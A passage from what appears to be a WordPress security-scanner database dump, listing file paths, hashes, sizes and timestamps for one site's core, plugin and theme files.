0d63731','',0,126,33188,1,1624521008,'',''),(1629897503,1,0,0,0,0,'35c5495d05b0161852f635bfe27f68d2d4209444','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/constants.php',2,'09ba19da561fa78ab0b7d33798bd6f0c33d454078e2a0fd5b9da4abcdf3c280d','5877f703be95546781a8cb417d06cd0a','',0,4220,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'35df5e70f99e13a7ea9e47d05f32034f8f2fa524','/home/westonspirit.org.uk/public_html/wp-admin/network/upgrade.php',1,'25b61986d36d630821b2c5e4244e73d75f453f3fae49788e4062f77ccfddf0c6','847123f6bfd491ad12d71a3b1f66c5c6','',0,4944,33188,1,1624521018,'',''),(1629897503,1,0,0,0,0,'35e267ddc47f68e6718d824f21e5c0ef6ef6f1a2','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/canonical.php',2,'558e3dfa307958667cdd358e042348993c15bbee18719c98f532581752ba0f8e','27fb24f9b63c9ca15a615937a8bcec8a','',0,4456,33188,1,1627642681,'',''),(1629897503,1,0,0,0,0,'35f7779bc118c89a86ca7e707bb7adb4df445550','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-admin-menu.php',2,'5390edd3f780eae492227e7aeff721936c3595670f40b2ee8c7cd098705c6232','5986fd5451832972fb4ab8eb5eb5bae4','',0,3182,33188,1,1625053880,'',''),(1629897503,1,0,0,0,0,'35fd6482ba4e00cf7fded3184509ebafa278eff6','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/model/crypto.php',2,'3439109ad0f60a8881d2b042045f44df68e051f834ba1d0dd0f9b704c82aba2d','34735b95cde76c416334c166a1a8f60e','',0,8305,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'36029a3ffc7c1e89bb8afffbaf378a40065b8e4a','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/html.php',2,'bdba62a4303e5c714f17f566d8b93205e6c1d35f0e1bcc415d1aa352e3ae66cd','f047f94f7bb104e3f8a6970f92216d94','',0,2224,33188,1,1627570493,'',''),(1629897503,1,0,0,0,0,'36030812284c00e24254e337a53606e449964116','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/history/views/revisions-panel-template.php',2,'e09b4bc6c9e2871e679d9047e7017909c69afb687a7193dd888fcf3f995b4643','d32cf4eb8d98b3fd622239fb01750bb8','',0,3385,33188,1,1627570494,'',''),(1629897503,1,0,0,0,0,'362c922e342daa32a05bcbeb7d04c31ae0261428','/home/westonspirit.org.uk/public_html/wp-includes/IXR/class-IXR-value.php',1,'e8e3b954b66a2b0f0e17f2e79774cd93c6a10f05b72599194d1d712d983a69c7','03929d66fb3ea8356ccdf86a0066e80c','',0,3790,33188,1,1624521008,'',''),(1629897503,1,0,0,0,0,'363ac5523797818e972245adac90b5388f1605b1','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php',1,'855cf2543ee86cba3c7e21df70da162c6a65f95f402284d65c9fec5556b7ac24','ba113d93ae70b63525f3682404e62afb','',0,93475,33188,1,1624521008,'',''),(1629897503,1,0,0,0,0,'3660e49ef43e97dbb45f5e014aa242cdbf112e9c','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php',2,'3596e2ab2811e9abab94001d2dbc49b23eb4fc1eaf15e495c335c8b1f9bb5a9a','2d5fd0fb62cac12d3e4f8ca55ce88b83','',0,108814,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'3679e8d43c55e819cba913a543101c32ca69a138','/home/westonspirit.org.uk/public_html/wp-includes/revision.php',1,'e21cca294ee84054d30239b2928bb33888b52ace4826f7806923f31adf45cc1b','50d9829e67a24f566a58c0babe9fdf19','',0,22027,33188,1,1624520999,'',''),(1629897503,1,0,0,0,0,'3699f2746d3aa6a4b2394e13dca1843e105b6908','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/base/background-process/wp-background-process.php',2,'31b0313b98c0c1bec2d0499f66d033fff0e2a6617a64a30712fd3cbdee94d517','f3878cb7b8a0b35e397a5d4ecb4d9db6','',0,11013,33188,1,1627570490,'',''),(1629897503,1,0,0,0,0,'36aec0207d49a0e2392359211bcb7d2ac5ec6185','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/plugin.php',2,'db974a27ae71e3de3c940e2690adfc42f7128d6855c4f151207b06940681bf1b','6afe15fb71edeac4e82c81a0a7706826','',0,15054,33188,1,1627570492,'',''),(1629897503,1,0,0,0,0,'36b5dcc4093526036b7312a19d8d37e2f34e4688','/home/westonspirit.org.uk/public_html/wp-includes/functions.wp-styles.php',1,'6ded001f0d1dcec99b7f25b54d4e5c60be7962a811fcd83e029b0a3f0016aca1','93475100fcc1ddfa115b8cb69920fb39','',0,8303,33188,1,1624520999,'',''),(1629897503,1,0,0,0,0,'36c7b2e9cdc54c41019c5090614145e54ab24dd6','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/Diff.php',2,'067c1d6f87bd52783b4e117dc93711006dc662c6b5bf4cdb41a13b71ce7df1d5','a535567a59b35daa23795295db4addae','',0,5762,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'36d409221313a5a66c9961d4a9d46e86d6d2cae2','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-wpscan_directoryList.php',2,'cd3137f4591cd808013a42f2afe0b4b3287407b30bb0c88f83c8af407428951e','8569c40530f4a66a3889320ada739e1d','',0,2064,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'36d86bafbd77971b7c3fb2d08e2203cd9eb37fb4','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-admin-init.php',2,'956f1f7afa8b3a4253226a16de2b454379c23299df8407ff8e767d6f014ba5d3','03be16eddf3a6a43d36f0022b2c352bc','',0,21593,33188,1,1625053880,'',''),(1629897503,1,0,0,0,0,'36e2f68a47e5c37690b022146ac61ee32770db03','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/select.php',2,'4015ce22bcd953da3e25f6739c15e21e655bebd973d3b211f291334fae9b3360','6d7397d7ce30ef25b10ca546b3738fd3','',0,2537,33188,1,1627570492,'',''),(1629897503,1,0,0,0,0,'36f9adf78af7f91dd690ce9e77bb05f174cc8d77','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/template-parts/footer/footer-widgets.php',3,'ab4f5ef715bd2262760122aa1ccaa9923508b313cd735d0ececb5c8da8338e31','d21d51ad785bfd892f85d89f5be74e9c','',0,528,33188,1,1619440190,'',''),(1629897503,1,0,0,0,0,'36fb86b57f2fd75788fb56c2e7fd1d32a928636f','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/debug/classes/inspection-base.php',2,'b403e722ad1e51cca4e5dc5b738ec5d39a58bf63eb3b7cda4c936daf23d09ab1','10b7c1e24cbbf83de883c7e5f5821834','',0,494,33188,1,1627570490,'',''),(1629897503,1,0,0,0,0,'37163781140f60d964a6d683339bbf88297312d1','/home/westonspirit.org.uk/public_html/wp-includes/category.php',1,'2662a0fe57d7e2a4617939710582f5757b59727ad612e1fb81ac3308a7683dbf','c860e5f06bb333771668d6de6b87cd94','',0,12712,33188,1,1624520999,'',''),(1629897503,1,0,0,0,0,'37209aa4312d317f748b1eb5c1541982983c87f1','/home/westonspirit.org.uk/public_html/wp-includes/ms-default-constants.php',1,'ad59207e92c14b4c367a4c66c604f822dac96f3500afbb75bc82cd907fde2d70','268b259a4deb8b41ba628fe9e459e88f','',0,4710,33188,1,1624521001,'',''),(1629897503,1,0,0,0,0,'3722ac9b2e1384fc4a34d98fe6f1d90b7ee23260','/home/westonspirit.org.uk/public_html/wp-includes/post-thumbnail-template.php',1,'09463ff74676e9beaff5f59b63cafe1860f2a107a3538a25f1b1e88533dee7d2','93eecc649ee8950756818e63ea988405','',0,9353,33188,1,1624521000,'',''),(1629897503,1,0,0,0,0,'374c41b7764ab9dfa89a0b252aa72e2838031a24','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/classes/class-twentytwenty-svg-icons.php',3,'1c208fe89a1a98e0174df372df84ab7cced1ca85aa890aae8abbec1b8959f128','2368e01e78deef548f67a02f781ef71e','',0,68253,33188,1,1619440189,'',''),(1629897503,1,0,0,0,0,'3773dca7db4140efa43996c5daf27598a81ccd87','/home/westonspirit.org.uk/public_html/wp-admin/includes/comment.php',1,'42ce30fbdb35445b7ff64cf9ca32988c259d710bac9669df4fba59d010f32cf8','c004491d7c99168c146c1975e2af44ff','',0,6067,33188,1,1624521017,'',''),(1629897503,1,0,0,0,0,'37874b9c17644c4a68a0976d44f65a0870c429b0','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',1,'3d9cc2c6e0af0415b5d19c825eb7d62caa1299ee31ab68715982976b53c9d853','8d10a9897cae57779a623e45cff2794a','',0,1503,33188,1,1624521007,'',''),(1629897503,1,0,0,0,0,'379bb97afcb320e40b6b89281cd6257a24165375','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-user-login.php',2,'2ddc4466c338f327a4ef938c5580000f044e8b9595ea90973599714b5cd6e2e9','328167329c2e71457810020b4aa14826','',0,36972,33188,1,1625053880,'',''),(1629897503,1,0,0,0,0,'379f63b41380dde09c3db6e79d9e64add08b9d9a','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php',2,'19c2ca9061ff637926b6578c18c3c061b9a1a07820da795a8961da2bd9c767cc','0f2749e2cb9e036146747a5c04c4c7ae','',0,15600,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'37a0250f52b74730444319493b255e9edfa16c3a','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/data/manager.php',2,'02f77748169fba871b0f300563af3aadf83748b838c19b9b7bf46233d8f40100','db9a63a76cbe1c946d4608a77e6c6e8b','',0,9487,33188,1,1627570492,'',''),(1629897503,1,0,0,0,0,'37b188a104cab5b5e3a27fc8dd027da52891d0af','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfConfig.php',2,'499d1aa589be6c48f3227998566ef65c5968b6899725bef674f136716b688025','72be19b09ee8886bf250240166a811f3','',0,87889,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'37b2a4dd261252bc91f97ab14b19719287f26227','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/usage/module.php',2,'482574ada96105108f6c9e4e2c1dc9ef7f03dd76ffc1427a596f87aa8910f705','819cbabbaf7f7d3625b0836290eb5fbc','',0,15734,33188,1,1627570494,'',''),(1629897503,1,0,0,0,0,'37c267d5c522cd318b7662c02368e8516645d91a','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature-pre-5-7.php',2,'abdd16eb7ee88c6808fd05976c4333b59f1a2191490e65d1522b502515fcf605','9d828aded866e57158828dbb06a915b9','',0,51683,33188,1,1625053880,'',''),(1629897503,1,0,0,0,0,'37c3e78948abca458364c61b37caa747e33e80be','/home/westonspirit.org.uk/public_html/wp-includes/blocks/archives.php',1,'b377e0e11d7f305ca9137bbe0a280def0c275b41ef70eff7091064bdb40a81f3','a77bedc40a503f5ed8e7a7fa753ae909','',0,2768,33188,1,1624521005,'',''),(1629897503,1,0,0,0,0,'380ac6e43c4de7d153e0680a3fb907d177394d26','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/common/page-tabbar.php',2,'fee00636758dfa8eeeac23550929dfed7ff73e3955b4e6e0cc1d8f9fbc38e6b1','bb83291aafb00cf374553245633027e9','',0,759,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'381037a34393086f9d7b7b95c24ca75694e251e4','/home/westonspirit.org.uk/public_html/wp-includes/IXR/class-IXR-introspectionserver.php',1,'726ccbea478e2d5d1349403e3590bf08395a1083a188be787f6f105b94d8443f','325561be77e43cf849779170864f372d','',0,5323,33188,1,1624521008,'',''),(1629897503,1,0,0,0,0,'382a5897bfc28a765f3de25578b3886001f4134b','/home/westonspirit.org.uk/public_html/wp-content/plugins/wp-cerber/cerber-ripe.php',2,'3882f986e654ad446c962f2affab7e7e3b319b4b1011be278e41f4b9f44de2bb','e2fc5add619fde0fb747d4352e4cb8eb','',0,5868,33188,1,1625053873,'',''),(1629897503,1,0,0,0,0,'3839eaf1fbc67b67a1050eca3172d401b5bfa842','/home/westonspirit.org.uk/public_html/wp-admin/includes/schema.php',1,'85bdde459c2506624b529bd3932229a644f182e42e1834e6782c916b1c31c025','f8f9a1504920bcf16bacdde70fa8c509','',0,42034,33188,1,1624521018,'',''),(1629897503,1,0,0,0,0,'3860f78a978537a5d5ab595f6647ed028dbd33b0','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Insights.php',2,'abfb5f462c5bc68c556bff771b3fc049fa55023a05245bc9d9fa241aa5b994a7','8c47c61b8cdf3da3be9d310a56e730ee','',0,2256,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'3898e9f0ef18d45df86ebb8cc4a70dd5b66d8044','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php',2,'5c98b769fd291e5e27756e8bb08973a9234e71d350d5b565125c0e92b925c18e','f857d5537afa4cff484157720fb4367e','',0,22334,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'38b11f1793865b841d0e24451276800683233c79','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-captcha.php',2,'2e1035c377f628307755dfc95db4f0de273d493200b9ac856ec1090dccf99293','b511b77067faaf11f221ccd02f85d59d','',0,10660,33188,1,1625053880,'',''),(1629897503,1,0,0,0,0,'38ee06b70a17966e4b5829721410a8dee9a6ef01','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/wp-widget.php',2,'6153a0c3751e3f21b4f35b828870781f116d242c2c4b590a0e54c540d698b3e3','6a6059b04a82a433b2d219510152af14','',0,1378,33188,1,1627570492,'',''),(1629897503,1,0,0,0,0,'38f8993c87e9ffa05b07fa607c4c04477647647b','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php',2,'27dcbf306ca9edb894e52b9dd56ffd625c51eca87c14fed20bab38841377b742','dff0aaad3787f5c2a40dac46c4dd0c67','',0,185,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'390f24748e64d3a0c9394df3980cb2cdc3b5638a','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/admin/index.php',2,'a827ee517278df888c10c2ed76eb94d12509b1e2981c17ab478540af34285afa','7a39d5a3948a2383dae1d040d672a9e0','',0,58,33188,1,1625053880,'',''),(1629897503,1,0,0,0,0,'3910b928eadaddbfa80b03ba4e2e8c69e3dc9403','/home/westonspirit.org.uk/public_html/wp-content/plugins/wp-cerber/modules/aaa-wp-cerber.php',2,'08ff4b1bb3bb54dcc436f6e7ba45af7e3c4801043d69492d1293f53d341d8c88','ad3357ae54b8c10dc1d8b7983138c4e2','',0,1454,33188,1,1625053873,'',''),(1629897503,1,0,0,0,0,'3911869c8ebda4e52ee1da92f03b0d12ca4a3f24','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Common.php',2,'8c0cec9dc6c2610d558ca8cce80361b4425c15b0660315450efb0d384c2ae67f','603484c218da75420a45d423408fba57','',0,6738,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'393c130ca92aba1241e2ef373b58d45d5842552d','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/wordfence.php',2,'8c2d441c28433d5e0a25da1ae50daecb52195c755d9ec9acb5a0048a08311516','a246182865b0a78fa5e99fb2371a2ec3','',0,3308,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'395e15ce5acedb0b520fd67f3010fccde277b8c0','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Core.php',1,'a19b59f0f1a6e6f3d6b788590b669458ba78fb16a0a9d4317c299f7707cca3f6','d8b23361dda9e63029acad5fe0041f53','',0,2235,33188,1,1624521002,'',''),(1629897503,1,0,0,0,0,'39832d741edbe8cb7af1b16792acbca379efae22','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-walker-nav-menu-checklist.php',1,'692bf46476bc367a5130874cc9ba0580a4079260a2f4bb33da83e21ec0089299','08ba9d3f4c812c07036bb2dc7c076ea0','',0,5115,33188,1,1624521017,'',''),(1629897503,1,0,0,0,0,'39a5b801273c7cda6deb9710129a8825dcac5dd3','/home/westonspirit.org.uk/public_html/wp-admin/site-health-info.php',1,'cb4ab1e0b363964cbeeb412497ef25f4e8de1c4212e86aa6546120e964d6a33a','4b2375799e643ee7d9b2bd2848169428','',0,5783,33188,1,1624521013,'',''),(1629897503,1,0,0,0,0,'39b87c64deed850fc6d6a70d30716b82b118b72d','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-debug-logger.php',2,'fb7c62646653018023a8ff2d5cd1d54fbab6f8151d58e948ddcb16346e345439','147a9460fd18702ee55a622087783349','',0,2620,33188,1,1625053880,'',''),(1629897503,1,0,0,0,0,'39d0c7268676923f3cd396677bc4a7d2eeb80ac7','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-new-menu-section.php',1,'06ba70726a8d0b6aea0cb6ee8eaf5a7289c3a8c6677d6b35e3942687b15aa64e','8c091d99734c322f118042a4c196a5a3','',0,1693,33188,1,1624521006,'',''),(1629897503,1,0,0,0,0,'39d63c05a9283e21f43402ae0a096bfcb2b9d75e','/home/westonspirit.org.uk/public_html/wp-includes/sitemaps/class-wp-sitemaps.php',1,'fda60ee2ff570c7f0794a3659e190ede3afb0d568d64e256d98905a609a4ff2b','352e52cc00499375f727741c0856f308','',0,6290,33188,1,1624521008,'',''),(1629897503,1,0,0,0,0,'39e0f9bd90b4f24ea24198415461800918ec691e','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/heading.php',2,'f80c87e04423984b6cdaf2ac61b92d87e481eb2b3fcb1e8ecc7c2adcb1488614','50a8fac88e9e16bf3760a4b837c9b61f','',0,1346,33188,1,1627570492,'',''),(1629897503,1,0,0,0,0,'39e868e2f68755f021605f0c85df563cffa3d7d0','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/403.php',1,'7cedc897cb313446434ea6dbff3cc757382aa6d63c0aaf2004ffb6d09c095d37','bcd160e8f70dc76ffbbf6b33b7fe31df','',0,381,33188,1,1624521003,'',''),(1629897503,1,0,0,0,0,'3a125916696b2d00b11636cf6d748cf7733ae819','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php',2,'cf69947220bb1a2ad2bc47cada14cd787ccfe9bed817aa489828545ca167bcdd','59a54914f09653441b9bd6e2441a2e7b','',0,4341,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'3a31fbe6b488dcb27eaf823e6fb95bcafe331a38','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/live_activity.php',2,'0eac4658eafa4c57285c2904e2ca9bc5510c2bb36dd1b9398ea4a6af12ab6ed6','3cf7d6c7ec01b1d39a15253d5ac62633','',0,567,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'3a32188aea6e22cc834cd4ec28b9a61fc0370351','/home/westonspirit.org.uk/public_html/wp-admin/import.php',1,'b26d07a78e0105edcae3f841c8436548887e71cee5115623148df9127594f37b','22d1d69211e7d079a044d091c61e2397','',0,7530,33188,1,1624521014,'',''),(1629897503,1,0,0,0,0,'3a40bcda7b419babfdf4b49cc02f9f918231904f','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/admin/admin.php',2,'3d6af79c9ac6891f93c6d73d7eb8d2f8e01cd31d96536841d973e7e3ed460dae','d9775f8bd0caa1698f455a57e0476c72','',0,22308,33188,1,1627570489,'',''),(1629897503,1,0,0,0,0,'3a50ec0801a981cb593c45043b34c582d356fce3','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/models/common/wfTab.php',2,'1880c1eb41bb946523076f1f7076ad7a43f293ec7598e808eaae6e0cb81553fa','3206f60254d47d9a4857273c137d085c','',0,845,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'3a96182d69e63e4120de48acb39ab9243c3a807b','/home/westonspirit.org.uk/public_html/wp-content/plugins/disable-gutenberg/inc/settings-register.php',2,'f9f2b441c074f49e1fe392ec0727b86a2ff7a859ac88427daa8b44ee723dc827','5acaaa949d4ca002cf9392068cc468ed','',0,13888,33188,1,1626250895,'',''),(1629897503,1,0,0,0,0,'3abf979ca5b8b612521cc36a9443070166ffdde8','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/api/api-log.php',2,'b2fd6ee9a5cadc92270c86f894b37274ce5264d13c386db9bafdb016e13b9fc9','48e7541fdbabf2d0b68f0791a7cd18fe','',0,7563,33188,1,1627642680,'',''),(1629897503,1,0,0,0,0,'3af032c18a1af0156cdd6c021405e18c3f6da134','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-application-passwords-list-table.php',1,'f091bf6129516f6ff0c020fdfdb14f0e9b3678c74180a46f20422895a74a9a80','5bebd15ce9d0b1c428ca0e228cc74510','',0,6708,33188,1,1624521017,'',''),(1629897503,1,0,0,0,0,'3af91f4dfa30638ee92e73a0310bf79cc255c12c','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/wp-cli/library.php',2,'0ac3d02397612cf1ac7dbc2d6cb25dd18079042ca1d083cb34465a15eb7b2c24','19b9958645f08352552e4b11a54bfd28','',0,4435,33188,1,1627570494,'',''),(1629897503,1,0,0,0,0,'3afcba0e5700ff5c586e5a05d3f690f549a12578','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/database/schema/400.php',2,'7857ec76909d1e18907c111a8fe3ce25cff3c479252fd19ecff3eeb492ab2587','060754e3a821091a9141df5b348d0ada','',0,2851,33188,1,1627642680,'',''),(1629897503,1,0,0,0,0,'3b22246da95ccc695b70c7f750c1cb609411de5c','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/dynamic-tags/dynamic-css.php',2,'80d7802eb3c2fefe8dcaaf0bc9f19e1b73d140f194609395b4205af21383856d','edf18df9dc3d6922908629b58a0269c6','',0,2773,33188,1,1627570490,'',''),(1629897503,1,0,0,0,0,'3b224d481c9c02905c8247d42cfd444a409947cf','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-user-meta-session-tokens.php',1,'ee31bc19b24907b816d3447dc716833fba0f81a20a73a814d07a1ce4def43c49','9b382f2700b900b8a57618534c2d4700','',0,2990,33188,1,1624521000,'',''),(1629897503,1,0,0,0,0,'3b710b17b649bf197210921252e0459d5211330f','/home/westonspirit.org.uk/public_html/wp-includes/Text/Diff.php',1,'be3ae8a30fac6459de10ca680719313f116a3a5a4338f577abdd0ddcdf05e636','0df4c18c9104201a56e9eed33af70ea4','',0,12915,33188,1,1624521004,'',''),(1629897503,1,0,0,0,0,'3b7407424d254f315f5840eab7be69c7281d63cf','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php',2,'a3f22fde7500503732a32d4c3d3ab8c902fbd99fae4e5285a3010fbe030c2d4e','3eb911845fd03314f5d14e77b00c23f7','',0,1404,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'3bb3bc9b783752d192400b2210fd06ee5ea83184','/home/westonspirit.org.uk/public_html/wp-includes/block-patterns/two-images.php',1,'d79ab9cdf320c113da84cc44ea3deda278adcad62bfce9947c3e26e1b0205112','26dbda7f5f86773f56e13ad967fcfe43','',0,992,33188,1,1624521008,'',''),(1629897503,1,0,0,0,0,'3bb77bcb16379fb67119b66e2fbd94d677c05d9b','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/menu_firewall_blocking.php',2,'5873bafcc412178be432d969fbecfa5e34dbda3058607a81c32b4b23bacc6356','2c9fcc66dd8e3bc41eb6230c5413a5b4','',0,10204,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'3bc04a224872a725c4ce3fecb12879ec7224c8da','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php',1,'0c1bdcd6743d95c7ee0d1a16fb3956d30f974e95ab366144ecad2713d0dc668a','98c1098c12e649a5ddb6158d33828b53','',0,110,33188,1,1624521008,'',''),(1629897503,1,0,0,0,0,'3bd08383a69351616207402eb90885aed8d243af','/home/westonspirit.org.uk/public_html/wp-content/plugins/disable-gutenberg/uninstall.php',2,'199a873413b14fc4af4d6e360b0796d9761a71deafa1fd9b8e274e2fcf9a2976','9f77e94eb0a6350d5658a7301e923c26','',0,140,33188,1,1626250895,'',''),(1629897503,1,0,0,0,0,'3c0924e0e12e9f4c50bb691da88d47f740811cf9','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload.php',2,'b4dd21b4499bd6373dabec6e3b0201d74d98879c6623429a3b081d91904b3841','058dc19c7d6eeb333b6729bbe1c0f3bb','',0,2436,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'3c43a65d170a5b666c5081f0d849659959c3277b','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/onboarding/tour-overlay.php',2,'0504d3a273455ce442143f858a49b59a99d188294bf3ed54ba22ea2214f5a8f6','993a03e8be16bd259b20189f293ba700','',0,157,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'3c548f6dfc443946b20f733e571c9c50bcbc2b81','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-image.php',3,'c6759d0e725e1af9e11bd94c60cd5e94d3e68b1ec84b6250cdb3b8b4caed1dbd','3dabb35a6f62530a166735c2f6b28cf4','',0,520,33188,1,1619440191,'',''),(1629897503,1,0,0,0,0,'3c5805cfaac9abddd22adf3126d5b35c6153cede','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/admin/canary-deployment.php',2,'5dcef793b4f8c471ff0c0c41a83b8ab82493481482645dc9b3ea996e8cbeff96','c4c722ab8adb1c57104530ff82885b88','',0,5037,33188,1,1627570489,'',''),(1629897503,1,0,0,0,0,'3c748de2a4e173a41093d4a7975ff4f0edc5a248','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/waf/option-rate-limit.php',2,'af1b84e5a4f83546ad986c33ba77cf99d8bf5b6ca8cedbb5692140b546124b34','e4e229594dcb8dd25c17ce9e1fcdcb27','',0,4123,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'3c8b86689a907a502b437c831c5bf9b1becd747a','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php',2,'310bfc681001fba40ac842299f6ecad03f699c8415e3a9ce789558b30442b53f','9f86775520e1e604db90364d865cbd38','',0,3009,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'3cb471d8e0c6b585e8dbeca4a44d6495ff5ac40f','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/menu_firewall.php',2,'6d75beef25e9786781464b7cb0a4b00aad8c5bc886edc061cadfac93b0fe0d7a','a99ce31d3558a1f05095faba4b9b9da5','',0,2293,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'3cda1590618a54f6fc5e4d41d4260bb59720b924','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/options-group-basic.php',2,'49ea02b6db08984b4096fd5037a07e2d9e9ad3d856d4646d8367ef3648425f80','56458367184fba60236a56d434a7437c','',0,1413,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'3cde630a9cbb76afbbda294fcacf3038c7bf39f7','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfAlerts.php',2,'ef3ae1bb8b8b28bdefa62aea6435b87af79ff0b7c37d2c80c6ec033244651076','994bf92841ac9e7c8acfaf7914b1f04c','',0,7549,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'3ce10f39af0cee45de78e6b22e84ba1cc6347648','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/star-rating.php',2,'e80ce2fb8031e5486db506b299bc3500bcf1c1852a47b7b49c109776288b897d','23647301bc5e1d69994790096cd3e813','',0,11815,33188,1,1627570493,'',''),(1629897503,1,0,0,0,0,'3d1addd0c2f8d7355f06be625b487cbadb30346d','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfImportExportController.php',2,'41478d48eb4d9756194d1f4e3f3909af3e8891c9a994782a1573f285146d3ac4','fdb4f6fbad1b1bababb6b1f22b3eb1ff','',0,3306,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'3d22d30f06a64e1dfb3e5d17a91566387e0f22ee','/home/westonspirit.org.uk/public_html/wp-admin/profile.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'3d7901ddfcdb8f5c00028fedf113a4212e57393f','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,